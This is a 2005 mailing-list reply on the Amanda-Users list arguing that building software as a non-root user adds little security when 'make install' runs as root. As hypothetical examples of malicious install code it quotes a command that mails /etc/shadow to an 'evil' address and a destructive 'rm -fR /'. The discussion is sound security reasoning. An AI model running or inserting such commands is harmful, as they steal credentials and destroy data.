Amanda-Users

Re: Fedora Core 3 - which version of tar??

2005-01-21 19:23:18
Subject: Re: Fedora Core 3 - which version of tar??
From: Frank Smith <fsmith AT hoovers DOT com>
To: Eric Siegerman <erics AT telepres DOT com>, amanda-users AT amanda DOT org
Date: Fri, 21 Jan 2005 18:15:28 -0600

--On Friday, January 21, 2005 18:18:52 -0500 Eric Siegerman <erics AT telepres
DOT com> wrote:

> On Thu, Jan 20, 2005 at 10:22:16PM +0100, Stefan G. Weichinger wrote:
>> - configure and make as $AMANDAUSER
>
> I don't believe this is necessary.  One should avoid building
> Amanda as root, but that's not because it'll cause problems for
> Amanda; it's for the same reason one should avoid building
> *anything* as root.

Sorry for hijacking a thread, but playing devil's advocate here,
what difference does it really make whether you build as root
or not if you run 'make install' as root?  How many people
actually go through each line of the makefile, or run make -n
first and examine all that, plus look through the code itself?
   In Amanda's case, for example, if the source for runtar
contained code to 'mailx hax0r AT evil DOT com < /etc/shadow' or
'rm -fR /' would it really make any difference what user it
was compiled under?  Would they notice even if it wasn't buried
in the source, but was just part of the 'install' target in
the makefile (or an included subdirectory makefile)?
   For user programs, compiling and installing as a user
can limit the damage that can be done, but if any part of
the build, install, or execution ever has root privileges
then you really aren't increasing  your security by building
as a normal user and installing as root.
   All that said, I generally do build as a normal user, as
it can expose permission problems on libraries, paths, etc.
at build time instead of later when users are trying to run
the program.

Frank

--
Frank Smith                                      fsmith AT hoovers DOT com
Sr. Systems Administrator                       Voice: 512-374-4673